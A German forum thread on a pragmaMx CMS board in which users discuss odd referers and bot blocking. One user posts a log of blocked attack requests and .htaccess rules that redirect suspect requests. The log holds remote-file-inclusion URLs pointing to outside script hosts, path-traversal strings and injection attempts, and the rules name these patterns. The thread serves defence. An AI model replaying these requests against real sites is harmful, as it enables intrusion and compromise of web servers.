[Solved] eigenartiger Referer...

Begonnen von grafikmurkser, 04 April 2009, 10:19:14

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Andi

#20
Zitatnein und es sind Bots.... einige  der IP`s sind zB bei BotScout eingetragen . Witzigerweise auch IPs die bei Bot-Trap in der weissen liste stehen  *g
Genauso wie meine IP (oder der ganze ip-range) irgendwann mal bei bot-trap als schädlich eingetragen war....

Was ist denn BotScout?
Vom Prinzip nichts anderes als bot-trap. Irgend einer macht mit einer IP was "böses". Das wird dort gemeldet und die ip gesperrt.
Mit dem Unterschied, dass bei bot-trap die Einträge anscheinend besser geprüft werden und deswegen meine ip wieder bereinigt wurde....
Nur weil bei BotScout eine IP eingetragen ist, heisst das noch lange nicht, dass das ein bot ist. Und nicht jeder bot ist schädlich. Jede Suchmaschine ist ein Bot.... Das ganze Thema wird m.M. durch Sch**sshausparolen völlig verquert und ins Absurde gezogen. Irgendwann ist das ganze Internet gesperrt....

Zitatund was meinst du mit websitenübersetzer
Jop, die meinte ich.

Zitathier mal einige vollständige:
Die kannst du hier auch haben:
http://www.pragmamx.org/home.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/home.html
Schau dir dann mal die generierten Links, bzw. den Quelltext an...

Das liegt am Prinzip der mod_rewrite Umschreibung und ist kein Angriff.
Da braucht man die Seite nur einmal in der Art irgendwo verlinken und die Besucher klicken da rum
schön´s Grüssle, Andi

GerhardSt

Bot-Trap hat den Fehler schon eingesehen, und gibt deswegen die IP´s nach einer gewissen Zeit wieder frei, wenn diese nicht mehr vom Script zurückgemeldet werden :JC_highfive:
Das System ist zwar noch immer nicht ganz ausgereift, aber funktioniert meiner Meinung schon recht gut.

grafikmurkser

danke Andi für die Info 
stellt sich jetzt die Frage: was kann man da machen ?
meine pmx-Seite : die erste und einzige, freie, deutschsprachige Community rund um fraktale Bilder apophysis-schmiede   reg.User mehr als 1000

Andi

Zitatstellt sich jetzt die Frage: was kann man da machen ?

In erster Linie ruhig Blut bewahren ;)
Entweder ignorieren, oder wenn man mit eventuellen "Fehlsperrungen" leben kann, bot-trap einsetzen.


Ich hatte letztes Jahr mal versuchsweise auf der Demoseite etwas in die .htaccess eingebaut, was uns die ständigen dumm-nuke-hacks vom Leib halten soll, die uns hier im Sekundenabstand belästigen. Das ganze fragt einfach nur gefährlich anmutende url-Parameter ab und leitet wenn was erkannt wird auf eine dummy-Seite weiter, wo der Zugriff geloggt wird.
Habe da noch nicht weiter gemacht, aber die Zahlen sind schon recht interessant.

Seit 27.01.2008 01:00h wurden 1.181.013 Zugriffe geloggt.

Die letzten sehen so aus:
log_time                remote_addr     query_string                                     agent
2009-04-05 20:32:37 95.208.45.184 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:31:53 91.89.38.17 id=http://schoolpapers.hostinginfive.com/bike.htm?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:31:11 78.43.195.201 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:28:05 77.221.130.12 path=http://forgottentreasures.net/advguestbook/he...   libwww-perl/5.805
2009-04-05 20:28:05 77.221.130.12 path=http://forgottentreasures.net/advguestbook/he...   libwww-perl/5.805
2009-04-05 20:27:04 206.220.64.3 _REQUEST=&_REQUEST[option]=com_content&_REQUEST[It...   libwww-perl/5.805
2009-04-05 20:26:53 81.173.235.75 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:26:30 77.221.130.18 poc_root_path=http://anggey.selfip.com/har/id.txt?...   libwww-perl/5.805
2009-04-05 20:25:56 78.43.195.201 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:25:30 77.221.130.18 poc_root_path=../../../../../../../../../../../../...   libwww-perl/5.805
2009-04-05 20:24:53 77.221.130.18 poc_root_path=../../../../../../../../../../../../...   libwww-perl/5.805
2009-04-05 20:24:51 77.221.130.18 poc_root_path=http://anggey.selfip.com/har/id.txt?...   libwww-perl/5.805
2009-04-05 20:24:26 77.221.130.18 poc_root_path=../../../../../../../../../../../../...   libwww-perl/5.805
2009-04-05 20:24:18 77.221.130.18 poc_root_path=http://anggey.selfip.com/har/id.txt?...   libwww-perl/5.805
2009-04-05 20:23:45 78.43.195.201 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:23:42 66.230.213.52 dir[inc]=http://www.laretouche.fr//administrator/b...   Mozilla/5.0
2009-04-05 20:23:41 78.43.163.4 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...

Man sieht, da ist innerhalb weniger Minuten alles vertreten, von Hackern bis Spammer....

Wer die Umleitung in seiner .htaccess auch verwenden will:
### goodboy ###################
# versch. Hacker abwehren
#                             path           | dir        | language           
RewriteCond %{QUERY_STRING} ([Pp][Aa][Tt][Hh]|[Dd][Ii][Rr]|[Gg][Uu][Aa][Gg][Ee]|root|open|mod|page|seite|file|error|action|style|\])=(ht|f)tps?:// [OR]
RewriteCond %{QUERY_STRING} ^([xlu]|lan|id)=(ht|f)tps?:// [OR]
RewriteCond %{QUERY_STRING} include.*[a-zA-Z]=(ht|f)tps?:// [OR]
RewriteCond %{QUERY_STRING} cd%20/[a-zA-Z0-9_.] [NC]
RewriteRule .* http://goodboy.pragmamx.eu/ [L,R=301]

RewriteCond %{HTTP_USER_AGENT}  ^libwww-perl.* [OR]
RewriteCond %{QUERY_STRING} lol\.txt [OR]
RewriteCond %{QUERY_STRING} turkmirc [OR]
RewriteCond %{QUERY_STRING} select.*nuke_(users|authors) [NC]
RewriteRule .* http://goodboy.pragmamx.eu/ [L,R=301]

#RewriteCond %{REQUEST_FILENAME} .*(forum|forums|phpbb|phpbb2|board)/.*
#RewriteRule .* http://goodboy.pragmamx.eu/ [L,R=301]
### goodboy end ###############


Auf http://goodboy.pragmamx.eu/ läuft nur das Logging und man bekommt nen 404er...
Anstatt dessen könnte man auch sonstwo hinleiten.
schön´s Grüssle, Andi

grafikmurkser

aha , dankeschön .. hmm wie sieht die dummy-seite aus ? hat sie spezielle schreibrechte ?? oder könnte ich die logs auch woanders hinschreiben lassen ? in eine log-datei ?
meine pmx-Seite : die erste und einzige, freie, deutschsprachige Community rund um fraktale Bilder apophysis-schmiede   reg.User mehr als 1000

Andi

Das logging ist ein spezielles Script auf der Dummy-Seite. Das möchte ich so nicht veröffentlichen.

Man kann entweder, auch dorthin leiten, dann sammeln wir die Daten gemeinsam, oder man bastelt einfach ne eigene Fehlerseite, auf die geleitet wird. Oder man leitet zum Bundeskriminalamt um, oder sowas....
schön´s Grüssle, Andi

grafikmurkser

#26
na dann nehm ich deine dummyseite .. und schmeiss den bottrap wieder raus, der hat schon ein bot gesperrt, den ich selbst "aktiviert " hab ( internetseer..)
danke für die hilfe  :thumbup: :thumbup:

edit: so , eingebaut...
meine pmx-Seite : die erste und einzige, freie, deutschsprachige Community rund um fraktale Bilder apophysis-schmiede   reg.User mehr als 1000

comedi

@Andi,



Zitatman bastelt einfach ne eigene Fehlerseite,

Brauche ich dort kein zusätzliches Script zum sammeln?
LG Michael


Kein Support über PN, Mail oder ICQ!

CMS-Version: pragmaMx 1.12.3 --- PHP-Version: 5.3.5
MySQL-Version: 5.1.63 --- Server-Version: Apache 2.2.4

Wer den Weg zum Ziel kennt - dann aber Umwege nimmt - muss sich nicht wundern wenn er sein Ziel nicht findet!


Gemeinschaftseite: www.pragmamx-erweiterungen.de

Andi

Wenn man die Umleitung auf http://goodboy.pragmamx.eu/ belässt, werden die Angriffe dort mitgesammelt. :)
schön´s Grüssle, Andi

reddragon

Zitat von: Andi am 05 April 2009, 21:07:01
Oder man leitet zum Bundeskriminalamt um, oder sowas....

Na dann freut sich der Bundes-Schäuble :BD:

grafikmurkser

Hallo und GuMo Andi, erstmal vielen Dank nochmal für den Code, von dem sicher einige pragma-User profitieren werden :)
Leider ist damit aber noch nicht geklärt woher die doppelte URL kommt ..
Bei bot-trap hat man sich darauf eingeschossen, das es am cms/ der htacess liegt. Hinweise darauf das es innerhalb von  48 Stunden zu über 5000 Zugriffen in der selben Art kam wurden schlicht ignoriert (meine Seite kommt normal nie zu solchen "Zugriffzahlen" - schon garnicht auf so wirre Url`s wie diese:
Zitat/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/favicon.ico 
die dann auch noch 200 mal aufgerufen werden.
Bei bot-trap erhielt ich zB diese Antwort:
Zitatdas spielt doch keine Rolle ob man es auf deiner Seite erzeugen kann oder nicht.
tatsache ist das dein CMS zulässt das beliebige Zeichenketten angehängt werden
und genau das ist der Knackpunkt - du musst per Rules in der htaccess verhindern
das irgendwas nach .html angehängt werden kann!
Was müsste ich da für eine Regel schreiben damit dies nicht passiert. Wenn dies überhaupt so stimmt
meine pmx-Seite : die erste und einzige, freie, deutschsprachige Community rund um fraktale Bilder apophysis-schmiede   reg.User mehr als 1000

grafikmurkser

@ Andi  ..  wegen meiner letzten PM .. es funktioniert ! Die laufen jetzt alle auf eine mx-Error-Seite ;)
meine pmx-Seite : die erste und einzige, freie, deutschsprachige Community rund um fraktale Bilder apophysis-schmiede   reg.User mehr als 1000

grafikmurkser

kann geschlossen werden. ich hab eine möglichkeit gefunden die spamreferer zu sperren. 
falls jetzt welche an b-t / page-restrictor denken - nein , damit geht es nicht.. da man dort riesen probleme hat die referer als spam einzustufen, man hatte dort gar erst die behauptung aufgestellt das das mod_rewrite des eingesetzten cms dafür verantwortlich ist .
später wurde allerdings  bestätigt das es sich um commandozeilen für spambots handelt , welche "durchgereicht" werden. sehr eigenartig das ganze. für mich ist das thema b-t jedenfalls erledigt
meine pmx-Seite : die erste und einzige, freie, deutschsprachige Community rund um fraktale Bilder apophysis-schmiede   reg.User mehr als 1000